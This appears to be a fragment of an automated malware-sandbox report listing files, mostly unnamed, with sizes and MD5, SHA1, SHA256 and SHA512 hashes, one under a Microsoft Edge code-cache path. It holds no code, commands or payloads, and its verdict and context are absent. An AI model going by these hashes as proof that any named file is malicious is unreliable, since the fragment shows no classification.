C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize384B
MD5c1b5a89ecd7c97ffee1d2ba2136dbdca
SHA14e2670a23f37815433407b38db3b99d6692ee832
SHA256770efa537190c60f1e12f07f5eb900a8af6d9e01f7bf9188e22d84ed58fcf69b
SHA5125252966196f95d0b12f2a5e19f91bfaecee16dec33dd21f0a23618ca81e47ee47a68baac5321760d5d67c0dd2ca8b2b91c2dbcc125200981883ec2664d010db8
-
Filesize
446B
MD58035d5bffe4860941412762ed741016f
SHA11ec3c6faab6019ec40b351095e08cf6a538fcb1e
SHA256a0529a25012a76522195ad2592aae4cd7dad0f3e702444ea54e0d52c99b17846
SHA512215bc4c94becfced4a6fd35cab7d1a68ed81c9109af440c6666313de16ef3a9edda4a4a044c2d748747e9c56674a1185e402238ef662f83f663219c315cdbd34
-
Filesize
477B
MD5733c48a3026ab126f2117fdeb60b61ce
SHA1be75a0a05608cf69e008e944208e7a4721c827f4
SHA2563e71a0040d89f9f0d65bc5c600de8b576bab127222eb58f7aebdaa9ee0c35434
SHA51298c57202049a9cde4a5ca78240a3f4df45b32d6058cecf25b17a463c45299007675f5b5a5c888ce2cbbdfe409577d6923fcddc26c82e478d6e78170caca2091c
-
Filesize
6KB
MD575c89c3009310508c0bd407afa2c1ce3
SHA1359ead72061216597a129a95ba29323188239bf9
SHA256ed823c287076f4ba767b5d0302aa222477a9252b49c2441e4d492bf37c1ac2c8
SHA51240bac016a104c5ea0246ccf966e69b740c41d8eaba4f18103bdab13ebdff94bf5b591ba12524ded05a42362a58d385f30fb32eb21fa6bb8c12acfe21f2729644
-
Filesize
6KB
MD516b0a81b1d45609fb2673985428e9dcf
SHA1cfa4f3ed4ee2936e8b0efce76e2e10b6f268ef11
SHA25671860a2f85faf6f9762906a8623ce07c4d8ef0a4701b5a633f20fef916befe98
SHA512b3e88912117200ed492cd445b21b8cc18548f91e9ad8a985d6ac1583690f88aacb91bc4eb4932bc36be36911e7b5f954425b94457cf2f7719563919cc6b7c2ce
-
Filesize
5KB
MD54ffcae5afef5b62b5fe0dd5bf62e8259
SHA108410eeff7123d46be761293f70b2f131fb45cdf
SHA256aba3c373b71ddd69122f694e2c74327c5f5e3c676f388e6a9ce22c934176a36e
SHA5124ffe664912cbc2e820810e7ad70741a32be6e7d6ee9a588b9f0d99a2f73b39d5faf6d5bed459c611fd7127bd9987c1c5bffca4eec6bd157b8dba8b214c125e42
-
Filesize
6KB
MD5b1069d46e8439e56a58b45464a2baabf
SHA1b747b5f9bd4b20cbcac16b817b517d40f1cb3503
SHA2568c36817f6b9b9859b4611d0ecc466be87d9040b689edbeb05a5439006c6c0225
SHA512dde3b1bc1d2ea1a11b75bf25363acce4410fbe2a9b3471cd0e2032816d6b08d16e34bac2fdaa3975cf0fa1e9edb9fdfec3af3287234a7a9b1409ddf312a29d9d
-
Filesize
203B
MD5e8ed5a935c14e622b7a95ed2a5e7f913
SHA148ce82a6499f688c0a135ad164f81bf0fa8dc203
SHA256c0edfa53aa5a26590641bb805294b5040393631068c33208d64bb519c038e798
SHA512ed38d634956fd89dcce5df0d61b9c53ec1e0479ce54171b66d257f469a3bb7604f33cef576d15b5fbebc61afbadd4b4007f5280d6979f15c489cc16c172f8b9c
-
Filesize
203B
MD59097ae3ec4c5538391ee7500a15eb2d7
SHA1e7eafcf95095581cef0875b654ae117ad30df9ec
SHA25683e16ed7e44bd0353c1ff71c0238895b17cb5f6a9a6979282567469d17df3936
SHA512100c5a8266895475fd3a77eb600bf91f9a22faf59eac7bb66ba504e963a0924aba21d9a6da66951d4d8193b2fcd26de216bb3f1381c9c835f747f21b683f5228
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5a2aed2af8960bb133d28fb184c5ed21b
SHA1c8dff74eff82d33dfdc5050466162172210d2cd8
SHA256717904e0a9d9559a9cde6731752f1cff934a77cb25da1dbce02093d13e2c6142
SHA5124f4614883de41054cc8bad2399835d779ef72d854365b0976bca55206ceb2716bbdbe0b268e70873f04e035f1383fd5a2d7a8b0e909baa1e62990b7d57e3c0f7
-
Filesize
10KB
MD539fd8ce154893a7de3b4a86a5c93a77c
SHA16ced423c09dd06d04deec3dfddc6ff46a7272732
SHA256d04c41380e233229ae56ba3fde0d89b967ac2a9b3ea04679ba6602865581cc27
SHA5129806b5ffd4a45ea868513de73ffa03bdec8d434cf1a1b1a8e504cfdb4edffc0fdbc711dccea1e1b1807d18b919795c6d9747147af6ea924f539b9fabb31a3a7f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD529e117e9f0ce89cb29a3b14f39a2624b
SHA11c1060ef434826f6785ea248b647da569e83cd6a
SHA2563844008c0697a64633357ba8d7088ee41e36ac321969bb442b97eb31e530e4a6
SHA512757ac09a94ac4b434daeaf19509183e778208c5b82865e877ee25027080fb367a0e6a177a2ebb0e10dff1307975efb0d45b81568866bec478beca59bd822ab45
-
Filesize
4.7MB
MD5e63911bf851f892bab6d3933349a987e
SHA1c3f5bd1aca61bd086f1aea3e4b86419a836888ce
SHA256b8794c9251e2c6fbb96c458a5e1821ddd029335933dfbb03efa7db63673562e8
SHA512f00874b37580152bbb563b29763212de0452e8117f54e4199150cb8cebf3f4d8d1c31ed28d896b7b0cbb63c17e8847019ed76b53f7c0ae07021527705e1af17c
-
Filesize
2KB
MD500dd96d61abc3b13ee2b2f53825709cf
SHA1065ad0d9c134adbffc04f33a57e01553261d9f59
SHA2565b3c052a3ca07ec156a40a080cffca24ce7516c05d64a3a8e0f513fb2cb8c406
SHA512f6e7a464730d466ea3e9c74772fb69ccd70377da97c5c02677498e0d0f471fc0e6ffa375e776b54742623875f3aa93a8f095dcc42bbc3613b3ce005a89436dc6
-
Filesize
1KB
MD5aa226d12e5c406e0f9b200cc1db6e692
SHA199b9e6ddd5f014308299b785c0b9f189cab6f5c1
SHA256db2d01a278db75e47d7999ae172f958698c3f1da88303863ac4b138c5328378e
SHA51200485a529e54567fc0c42f1498ecb50ebf9ed7405b2c63506416bd21c4023ec2cdfc1ab89f1cf3bb81889261f6e91c89bbb7f406c919fdabebfb8ebf71a82311
-
Filesize
816KB
MD5aa88d8f40a286b6d40de0f3abc836cfa
SHA1c24eab9e4b10b159b589f4c3b64ef3db111ea1c8
SHA2568d633efeda1249356b11bf8f46583242356e4f903056b53bd25a99511d1790a1
SHA5126c2f2f6a2d66015f30158962d653e381136f0f30023380a0ce95bd0944d856113fbde65db52dbb3b5de1c0e2edf2cd53184e721c64b916834be4198c61224519
-
Filesize
877KB
MD56a639b68fe7f4e67b7510af13403772b
SHA1255ba543d6fdd8f037823ff321ec00abe3575c54
SHA2567118cd0d6956c84dc8ede10db84491d7884bfb0baa4a0ab96afc7eea47f46dd0
SHA51243cfa4cdf669df71d7da59669ec9653c4facba4c2e6fe52deada469116b5c8b63a927a9ddc2f240ca9e1a2cc4335c12936007662bf47cd11c7e61392af219cef